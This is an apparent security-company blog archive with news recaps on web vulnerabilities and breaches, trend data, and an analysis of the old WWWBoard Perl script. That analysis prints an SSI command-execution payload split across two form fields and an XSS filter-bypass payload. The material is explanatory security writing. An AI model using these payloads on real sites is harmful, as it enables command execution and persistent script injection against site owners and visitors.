Category Archives: Vulnerabilities

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13: Zombie POODLE, TCP/UDP Vulnerabilities, Jailed for XSS

This week Robert was keeping warm by his yule log while Jeremiah was freezing in the Boston snow and I won’t be putting Christmas ornaments in my beard no matter how many of you send me that blog post. To get right into it, we started off by talking about the return of POODLE. For those with short term memory loss, POODLE was a nasty vulnerability disclosed a few weeks back that affected SSL v3 which is: a) already widespread as-is and, b) easy to downgrade somebody’s browser to use. The zombie POODLE this week didn’t go after SSL this time and instead went after TLS 1.2 which is used *everywhere*. The most prominent place that will need patching is all F5 load balancers which are using this version of TLS – and that happens to be most of them. Sorry for all of you who lost sleep a few weeks ago because it is about to happen again this week. Happy Holidays!

Next, if you recall a topic from last week’s episode regarding Google’s alternative to CAPTCHA, well it appears Robert may be getting a Christmas wish early, and it didn’t take long. Before any of us had ever seen it in the wild, Google’s new solution to replace CAPTCHAs was found to be very easily avoidable. The check-box that is supposed to tell if you are a human or a robot turns out to fail back to a normal CAPTCHA which is nothing new. If that wasn’t useless enough, it actually introduces a new weakness that didn’t exist before! This check-box is clickjackable! You can gather tons of valid tokens that say you are a human and load them into your botnet or whatever you’d like.

Now buckle up and put your splash guards on because this next story blew our minds. A new proposal for the HTTP spec has popped up that would allow a browser to… wait for it… make TCP/UDP requests! Yup, you heard it. We had TCP/UDP and said: “Hey, let’s abstract a layer on top of that, and we’ll call it HTTP.” Now, fast forward to this month and we are saying: “Hey remember TCP/UDP? Lets put that on top of HTTP!” I’m picturing Dory from finding Nemo here. This opens tons of doors to all sorts of attacks behind a firewall via a web browser. Watch the video for a list of ideas that might be possible if this is implemented from Robert and I.

Lastly, we have a weird and sad story about somebody ending up in jail for a web “hack.” In Singapore, some unlucky fellow decided to poke around on their prime minister’s website. The website had a Google search bar embedded in it which seemed to tie into some reflection of that text which was unsanitized and therefore vulnerable to XSS. This led him to get a laugh out of it and craft a link with the reflective XSS in it and send it around which showed the prime minister’s site displaying a Guy Fawkes mask in reference to Anonymous. The thing with this though is that the site wasn’t actually defaced and no breach actually occurred. That didn’t stop the local authorities from sending this guy to jail for six months and fining him the equivalent of $34,000. As far as we know this is the first person since Samy on Myspace (who is my hero) who landed in jail due to XSS.

Keep an eye out for some Bonus Footage this week where Robert and I dig into some JavaScript Flooding attacks with an easy demo!

Resources:
POODLE back to bite TLS connections
The No CAPTCHA Problem
TCP and UDP Socket API
Singapore Hacker Jailed for XSS on Prime Minister’s Office Website

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 12: Operation Cleaver, Sony and PayPal Hacks, Google’s Alternative to CAPTCHA

Kicked this week off in the holiday spirit with Robert and Jeremiah hanging out in a festive hotel down in Los Angeles, probably preparing to cause lots of trouble. The first story we touched on was about Operation Cleaver, a report put out by Cylance. This research investigates the movements and threat of one particular pro-Iranian hacking group who was targeting airports and transportation systems across 16 countries. The claim is that this group has “attained the highest level of system access” across all the countries targeted. The reason us web nerds are interested is that the main front door used to start these hacks is pointing towards SQL injection.

Next, we had to do it: we simply couldn’t get away with a HackerKast without talking about Sony. This hack is bad. Bad for a lot of people and as Jeremiah points out, there is a real human aspect to this. Tons of real people’s information has been leaked that will cause a lot of pain. So far, 40GB of a claimed 100TB that was stolen is now leaked and available on the Internet via torrents. Robert brings up a good point that due to the business that Sony does, moving around Terabytes of data probably isn’t an alarm-ringing event. Another great point we discussed is that this hack required insider access. Even though the end result was bad, this does point to the fact that Sony is probably doing a pretty good job on their exterior security otherwise the attackers would’ve taken the path of least resistance there.

Can we get through an episode without talking about a WordPress vulnerability? Please? Anyway, we have another one this week that affects 850,000 WordPress sites. The culprit this time is the WordPress Download Manager which is extremely popular. This plugin is vulnerable to a very blatant Remote Code Execution via a simple POST request. An attacker can craft an HTTP POST request with some PHP code and it gets immediately executed on the server. This would lead to absolute and full compromise of the server running this plugin. Do I even need to mention that the vulnerable function has the names “ajax_exec” in it?

Robert then took a look at a nasty PayPal hack that was put out by an Egyptian researcher this week. The clever attack outlined here utilized a CSRF vulnerability to bypass protections in place to change a user’s password reset security questions. These security questions are a soft spot in a lot of web applications since they are just as good as a password to get into an account since if answered correctly you can just make your own password. The reason CSRF is so bad on this functionality is because an attacker can force an authenticated user’s browser to reset these questions unbeknownst to them. I then sat back for a moment and let Jeremiah and Robert reminisce about the good ole days when dinosaurs roamed the internet and CSRF wasn’t even considered a vulnerability.

Finally, we talked a bit about the new Google gadget recently released which is a bold new alternative to the ever-annoying CAPTCHA. Instead of entering some mess of garbled text, Google is claiming it can detect the difference between a bot and a human with just one click of a checkbox. Robert got visibly angered by this idea (ok maybe not, but he really doesn’t like it). He does admit that today this idea will work well due to the current heuristics in place of detecting a human. Things like mouse movements, time to click the button, etc., are key pieces of information that differentiate real from fake traffic and have been important to Google for the sake of detecting Ad Fraud for years. The problem lies in that this has now been released publicly for any attacker to fuzz this and defeat the heuristics. The rest of the problems with this probably deserve a separate blog post but to put a bow on it, what Robert is suggesting is that this is now going to raise the bar necessary for bot sophistication. Along with this boost in sophistication comes the fact that it will break the ability of non-Google-level heuristics to keep up.

That’s a wrap this week, hope you enjoy watching as much as we enjoy making these episodes!

Resources:
Security Advisory – High Severity– WordPress Download Manager
Hacking PayPal Account with Just a Click
Are you a robot? Introducing ‘No CAPTCHA reCAPTCHA’
Critical networks in US, 15 other nations, completely owned, possibly by Iran
Cylance: Operation Cleaver Report
Why Sony’s Plan to Foil PlayStation-Type Attacks Faltered

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week we decided to add a little bonus footage for a bit more technical content instead of just news stories. We mastered the power of Screensharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser Autocomplete hacking. This isn’t a new topic by any means but as us hackers get curious every once in a while, Jeremiah decided to see if this bug was still around.

The premise is simple: you can place a form on a website that you control. On that form you can ask for a user’s name. When you begin to type in that name, some browsers (Chrome & Safari featured in the video) will offer up the convenience of auto-filling the form for you. In this case the user doesn’t feel like typing their whole name out and allows the browser to do so. What the user doesn’t see is the rest of the form fields which are easily rendered invisible with simple CSS which are titled properly to grab the rest of the information out of your AutoFill contacts profile.

In the video Jeremiah shows how it is possible with a bit of tom foolery and Javascript to grab things like an unsuspecting user’s phone number, birthday, address, email, etc. just by having them starting to type in their name and letting AutoFill do the rest. This demo was done on Mac OSX using the latest versions of Safari and Chrome.

Again, not much new and revolutionary but still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is used widely as a simple form validator and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. This bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 – 1 million websites potentially using it, or similar vulnerable code. The piece that was amusing for all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging the bug was already in OSVDB from 2013 with no action taken. After warning the plugin’s author and writing the blog post on the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news since there are a ton of CAs out there already but what makes Let’s Encrypt interesting is the fact that it is a non-profit, *FREE*, certificate authority. The project is backed by EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers and is focusing on being free and easy-to-use to reduce the barrier to entry of encrypting your web traffic. Robert brings up a good question of browser support, if Microsoft or Google doesn’t support this right away it really only helps the 20% or so of the users using Firefox. The other question here is what effect this will have on for-profit Certificate Authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of this was terribly surprising to many of us in this industry but was certainly eye-opening for a lot of people out there. You can easily look up their advertising profile on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief I’m not into Reggaeton). However, the creepy one for me was the “Location History” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing as Mozilla also announced that they will be switching the default search engine used in FireFox to be Yahoo. This is HUGE news considering somewhere upwards of 95% of Mozilla’s revenue comes from the fact that Google pays to be the default engine. FireFox also still has 20% market share of browser users all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States that said the police are allowed to compel people for any sort of biometric-based authentication but not password-based. For example, a judge has said it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone but still not so for a four-digit-pin. This has all sorts of interesting implications when it comes to information security and personal privacy when it comes to law enforcement.

With absolutely no segway we covered a new story about China which seems to be one of Robert’s favorite topics. Turns out that China came out with a list of a ton of new websites they blocked from anybody accessing and one that stood out was Edgecast. Edgecast was particularly interesting because on it’s own it isn’t a website worth noting but they are a CDN which means China has blocked all of their customers as well which could affect hundreds of thousands of sites. The comparison was made of it being like blocking Akamai. Will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, often the affected company will [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL Injection, brute-force, phishing, password reuse, old and well-known vulnerability, etc).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an to attempt convey that the company did nothing wrong, that there was nothing they could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that they “take security seriously,” — so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec of what constitutes a ‘sophisticated’ attack. Clearly, some attacks are actually sophisticated – Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The tweets received were fairly consistent. I distilled the thoughts down to set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.

#HackerKast 8: Recap ofJPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast, with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not any of their main webpages but a one-off brochureware type site to promote and organize a company-sponsored running race event.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness that is pointed out here is that most of these types of services utilize a four-digit pin to get to your reward points account. Robert makes a great point here that even if they move from four-digit pins to a password system, they stop can make it more difficult to brute force, but if the bad guys find value here they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion network version of Facebook that has begun to get set up for the sake of some anonymous usage of Facebook. There is the obvious use of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out and not worry about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface but they allowed you to upload this JSON file which had some additional configs and inputs for SEO tags. This file was not sanitized and an XSS injection could be stored making it persistent and via file upload. Pretty juicy stuff!

Finally we wrapped up talking about Google some more with a bypass of Gmail two-factor authentication. Specifically, the attack in question here was going after the text message implementation of the 2FA and not the tokenization app that Google puts out. There are a list of ways that this can happen but the particular, most recent, story we are talking about involves attackers calling up mobile providers and social engineering their way into accessing text messages to get the second factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

#HackerKast 7: Drupal Compromise, Tor + Bitcoin Decloaking, Verizon’s ‘Perma-Cookie,’ and Formula One Racing

This week Jeremiah Grossman, Robert Hansen and Matt Johansen discuss the latest around the recent compromise to Drupal which affects any Drupal 7 site that was not patched prior to Oct. 17. Also, Robert takes us to the Circuit of the Americas Track in Austin to talk a little about a Tor + Bitcoin can effectively decloak people and even allow users to steal all the user’s bitcoins. Also a topic of discussion this week: Verizon’s Unique Identifier Header, or UIDH (aka a ‘Perma-Cookie’) which can be read by any web server that you visit and used to build a profile of your internet habits.

Resources:
Assume ‘Every Drupal 7 Site Was Compromised’ Unless Patched By Oct. 15

Verizon’s ‘Perma-Cookie’ Is a Privacy-Killing Machine

Bitcoin Over Tor Isn’t a Good Idea